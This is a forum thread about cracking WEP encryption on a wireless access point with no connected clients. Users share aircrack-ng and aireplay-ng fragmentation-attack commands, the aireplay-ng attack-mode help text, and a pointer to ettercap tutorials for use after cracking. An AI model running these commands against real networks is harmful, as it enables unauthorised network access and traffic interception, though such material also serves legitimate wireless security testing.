
Thread: AP with no clients

  1. #1
    Just burned his ISO
    Join Date
    Apr 2007
    Posts
    18

    AP with no clients

    Guys,

    Is there a guide to crack WEP on an AP with no clients?

    John.

  2. #2
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533


    Quote Originally Posted by mrhotdoguk View Post
    Guys,

    Is there a guide to crack WEP on an AP with no clients?

    John.
    Yes. Search for clientless WEP cracking.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  3. #3
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    18


    tazforum.thetazzone.com/viewtopic.php?t=6611

    my tutorial, hope it helps, pass it on if you like it.

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Quote Originally Posted by jaymill23 View Post
    tazforum.thetazzone.com/viewtopic.php?t=6611

    my tutorial, hope it helps, pass it on if you like it.
    Nice tut...just read it...but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs

    **note, if it's 128 bit, change 64 to 128**"

    How do you know if it's 64 or 128 bit encryption?? I assumed you couldn't tell.
    --=Xploitz=-- ®
    Remote-Exploit.orgs Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=9063)
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" (http://forums.remote-exploit.org/showthread.php?t=7872)
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=8230)
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" (http://forums.remote-exploit.org/showthread.php?t=8041)

  5. #5
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533


    Quote Originally Posted by Xploitz View Post
    Nice tut...just read it...but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs

    **note, if it's 128 bit, change 64 to 128**"

    How do you know if it's 64 or 128 bit encryption?? I assumed you couldn't tell.
    If you don't know, leave out the -n option. It will default to 128 which is most likely.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  6. #6
    Just burned his ISO
    Join Date
    Mar 2006
    Posts
    10


    When I input aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8 all I get is a bunch of options. Does this mean my card is not supported??
    filter options:

    -b bssid : MAC address, Access Point
    -d dmac : MAC address, Destination
    -s smac : MAC address, Source
    -m len : minimum packet length
    -n len : maximum packet length
    -u type : frame control, type field
    -v subt : frame control, subtype field
    -t tods : frame control, To DS bit
    -f fromds : frame control, From DS bit
    -w iswep : frame control, WEP bit

    replay options:

    -x nbpps : number of packets per second
    -p fctrl : set frame control word (hex)
    -a bssid : set Access Point MAC address
    -c dmac : set Destination MAC address
    -h smac : set Source MAC address
    -e essid : fakeauth attack : set target AP SSID
    -j : arpreplay attack : inject FromDS pkts
    -g value : change ring buffer size (default: 8)
    -k IP : set destination IP in fragments
    -l IP : set source IP in fragments
    -o npckts : number of packets per burst (-1)
    -q sec : seconds between keep-alives (-1)
    -y prga : keystream for shared key auth

    source options:

    -i iface : capture packets from this interface
    -r file : extract packets from this pcap file

    attack modes (Numbers can still be used):

    --deauth count : deauthenticate 1 or all stations (-0)
    --fakeauth delay : fake authentication with AP (-1)
    --interactive : interactive frame selection (-2)
    --arpreplay : standard ARP-request replay (-3)
    --chopchop : decrypt/chopchop WEP packet (-4)
    --fragment : generates valid keystream (-5)

  7. #7
    Just burned his ISO
    Join Date
    Mar 2006
    Posts
    10


    This works great. I never put in ath1 after aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8.

    Great tutorial keep up the good work.

  8. #8
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533


    Quote Originally Posted by jay2005 View Post
    when i input....all I get is a bunch of options...
    In almost any program, this is a good indication that you gooned up something on the command line, as you already figured out.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  9. #9
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    18


    Thanks guys.
    I have 2 ettercap tutorials on the site as well, that you could use after cracking the WEP.
